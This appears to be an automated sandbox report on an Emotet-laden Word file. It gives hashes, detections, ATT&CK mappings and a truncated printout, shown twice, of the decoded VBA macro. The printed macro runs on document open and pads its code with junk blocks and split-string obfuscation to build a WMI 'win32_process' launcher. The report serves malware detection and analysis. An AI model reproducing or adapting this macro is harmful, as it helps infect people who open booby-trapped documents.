Emotet Office (OLE) malware analysis — malicious · 17e6fbbc141f6b7e

MALICIOUS

Office (OLE)

253.4 KB Created: 2020-01-17 06:37:00 Authoring application: Microsoft Office Word First seen: 2020-09-24

MD5: 1bf4c097c94e03f5009b0d74b7d504d9 SHA-1: a5c084eb04baea13b631229be752313fe7fe6fd9 SHA-256: 17e6fbbc141f6b7e27df7ddeb423b4aee5adfecd80db00b9990b85ca7d75fa88

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common execution vector for Emotet. The ClamAV detection explicitly names Emotet. The macro's use of GetObject and p-code execution further supports this classification. The macro likely downloads and executes a secondary payload, a typical Emotet behavior.

Heuristics 6

ClamAV: Doc.Malware.Emotet-7544675-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-7544675-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7809 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7809 bytes
SHA-256: `81cbb7693744e371675d50f53b08f806271878894c06cbb3a0cfdd7264d83790`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Csdyaeczv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Nwmfvwrdv End Sub Attribute VB_Name = "Jedxnmjg" Attribute VB_Base = "0{980FB290-0271-4E09-8A3C-1AA360368E35}{611F269E-E5BA-4C07-920C-3822E64BCABB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Tmiquaxqxb" Function Bhntobeqq() Select Case Hxncfvcvgqr Case 5815 Laoschbyd = Log(3331) Znjmabclwfkr = 4 Hvxqfohzsjl = CSng(trrD0) Case Xzhqeztcsmpvf Haaicdvle = ChrW(RSd) Klavzbwcemoog = 472 Mojhvzzcrric = Cos(rfTD3Iu) Case 5 Bndifpibwmoyd = 76 Tluqkqhcwmyk = Atn(3391) Eqywgcylga = Sin(Krwtxwpjyf) End Select Pjugchbf = ChrW(wdKeyP) Select Case Tnpexudllvz Case 5815 Tbchzepohlf = Log(3331) Ackgmevi = 4 Pbhmaxpltm = CSng(trrD0) Case Uvaeqkbl Xutbbejvkh = ChrW(RSd) Ngrspqraluq = 472 Oghnlgilf = Cos(rfTD3Iu) Case 5 Szwlcycfbg = 76 Myvltbycettn = Atn(3391) Hzaqdhcf = Sin(Ugxnslybglu) End Select Abckmkpb = Pjugchbf + Jedxnmjg.Pjdappwsjrn + Jedxnmjg.Kkywopkkribmw Select Case Qkxwgtho Case 5815 Itbstcxbyn = Log(3331) Gyuiscxvid = 4 Dcspxizhw = CSng(trrD0) Case Uahawxwlxwgd Xberzdfg = ChrW(RSd) Qjhdqnwocfa = 472 Caxlsqixyu = Cos(rfTD3Iu) Case 5 Hupwanod = 76 Nptujzrata = Atn(3391) Brcrnposspt = Sin(Tgscrlfssm) End Select losd = Jedxnmjg.Fvnepzivdgdec.GroupName Tqkuhkzfjb = Split(Abckmkpb + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=") Select Case Gjctghqh Case 5815 Rqgvoipa = Log(3331) Xihwgeedxet = 4 Fspvjlcd = CSng(trrD0) Case Fythbwgisax Bfmccnkskqnac = ChrW(RSd) Fonleucxnw = 472 Qvbafbunq = Cos(rfTD3Iu) Case 5 Zpivvifgyx = 76 Dmmyezhy = Atn(3391) Ftwiphyikvien = Sin(Ygphpfkwsynsd) End Select Bhntobeqq = Dowoomurive + Join(Tqkuhkzfjb, "") + Dowoomurive Select Case Gknntjcv Case 5815 Fwpepfavti = Log(3331) Abugctwbicq = 4 Sdvsnmqinhk = CSng(trrD0) Case Kpgllpor Tmgiyaccfy = ChrW(RSd) Bfcfvvgmujbaj = 472 Wrbcwisbgger = Cos(rfTD3Iu) Case 5 Efgmnnbjft = 76 Xrjlgzrggl = Atn(3391) Tpjdwyrdybpev = Sin(Ttmmhjllbruae) End Select End Function Function Nwmfvwrdv() d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Jedxnmjg.Ifyphkyrel + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss" Select Case Ttrskoiywqmc Case 5815 Cyojduioxo = Log(3331) Qulbjuuvra = 4 Bfmopsdj = CSng(trrD0) Case Ccqpcmjfvc Xomugrio = ChrW(RSd) Ljhyiuyf = 472 Ddsjlushmmfkt = Cos(rfTD3Iu) Case 5 Ybulmbqsa = 76 Hdeogqrkw = Atn(3391) Cjlzabiwaphq = Sin(Etzynlssfmod) End Select E = "//====dsfnnJJJsm388//=" Select Case Hvjjwlmcjd Case 5815 Mhpipmkodzq = Log(3331) Kxiemskvmt = 4 Fqpxytnuihxj = CSng(trrD0) Case Orohhedylod Kwszowpkvureg = ChrW(RSd) Cdzyywesgf = 472 Pgfbtawdypi = Cos(rfTD3Iu) Case 5 Qgtxxcabrwi = 76 Yagdl ... (truncated)

SHA-256: 81cbb7693744e371675d50f53b08f806271878894c06cbb3a0cfdd7264d83790

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Csdyaeczv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Nwmfvwrdv
End Sub

Attribute VB_Name = "Jedxnmjg"
Attribute VB_Base = "0{980FB290-0271-4E09-8A3C-1AA360368E35}{611F269E-E5BA-4C07-920C-3822E64BCABB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Tmiquaxqxb"
Function Bhntobeqq()
   Select Case Hxncfvcvgqr
      Case 5815
         Laoschbyd = Log(3331)
         Znjmabclwfkr = 4
         Hvxqfohzsjl = CSng(trrD0)
      Case Xzhqeztcsmpvf
         Haaicdvle = ChrW(RSd)
         Klavzbwcemoog = 472
         Mojhvzzcrric = Cos(rfTD3Iu)
      Case 5
         Bndifpibwmoyd = 76
         Tluqkqhcwmyk = Atn(3391)
         Eqywgcylga = Sin(Krwtxwpjyf)
End Select
Pjugchbf = ChrW(wdKeyP)
   Select Case Tnpexudllvz
      Case 5815
         Tbchzepohlf = Log(3331)
         Ackgmevi = 4
         Pbhmaxpltm = CSng(trrD0)
      Case Uvaeqkbl
         Xutbbejvkh = ChrW(RSd)
         Ngrspqraluq = 472
         Oghnlgilf = Cos(rfTD3Iu)
      Case 5
         Szwlcycfbg = 76
         Myvltbycettn = Atn(3391)
         Hzaqdhcf = Sin(Ugxnslybglu)
End Select
Abckmkpb = Pjugchbf + Jedxnmjg.Pjdappwsjrn + Jedxnmjg.Kkywopkkribmw
   Select Case Qkxwgtho
      Case 5815
         Itbstcxbyn = Log(3331)
         Gyuiscxvid = 4
         Dcspxizhw = CSng(trrD0)
      Case Uahawxwlxwgd
         Xberzdfg = ChrW(RSd)
         Qjhdqnwocfa = 472
         Caxlsqixyu = Cos(rfTD3Iu)
      Case 5
         Hupwanod = 76
         Nptujzrata = Atn(3391)
         Brcrnposspt = Sin(Tgscrlfssm)
End Select
losd = Jedxnmjg.Fvnepzivdgdec.GroupName
Tqkuhkzfjb = Split(Abckmkpb + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
   Select Case Gjctghqh
      Case 5815
         Rqgvoipa = Log(3331)
         Xihwgeedxet = 4
         Fspvjlcd = CSng(trrD0)
      Case Fythbwgisax
         Bfmccnkskqnac = ChrW(RSd)
         Fonleucxnw = 472
         Qvbafbunq = Cos(rfTD3Iu)
      Case 5
         Zpivvifgyx = 76
         Dmmyezhy = Atn(3391)
         Ftwiphyikvien = Sin(Ygphpfkwsynsd)
End Select
Bhntobeqq = Dowoomurive + Join(Tqkuhkzfjb, "") + Dowoomurive
   Select Case Gknntjcv
      Case 5815
         Fwpepfavti = Log(3331)
         Abugctwbicq = 4
         Sdvsnmqinhk = CSng(trrD0)
      Case Kpgllpor
         Tmgiyaccfy = ChrW(RSd)
         Bfcfvvgmujbaj = 472
         Wrbcwisbgger = Cos(rfTD3Iu)
      Case 5
         Efgmnnbjft = 76
         Xrjlgzrggl = Atn(3391)
         Tpjdwyrdybpev = Sin(Ttmmhjllbruae)
End Select
End Function
Function Nwmfvwrdv()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Jedxnmjg.Ifyphkyrel + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Ttrskoiywqmc
      Case 5815
         Cyojduioxo = Log(3331)
         Qulbjuuvra = 4
         Bfmopsdj = CSng(trrD0)
      Case Ccqpcmjfvc
         Xomugrio = ChrW(RSd)
         Ljhyiuyf = 472
         Ddsjlushmmfkt = Cos(rfTD3Iu)
      Case 5
         Ybulmbqsa = 76
         Hdeogqrkw = Atn(3391)
         Cjlzabiwaphq = Sin(Etzynlssfmod)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Hvjjwlmcjd
      Case 5815
         Mhpipmkodzq = Log(3331)
         Kxiemskvmt = 4
         Fqpxytnuihxj = CSng(trrD0)
      Case Orohhedylod
         Kwszowpkvureg = ChrW(RSd)
         Cdzyywesgf = 472
         Pgfbtawdypi = Cos(rfTD3Iu)
      Case 5
         Qgtxxcabrwi = 76
         Yagdl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.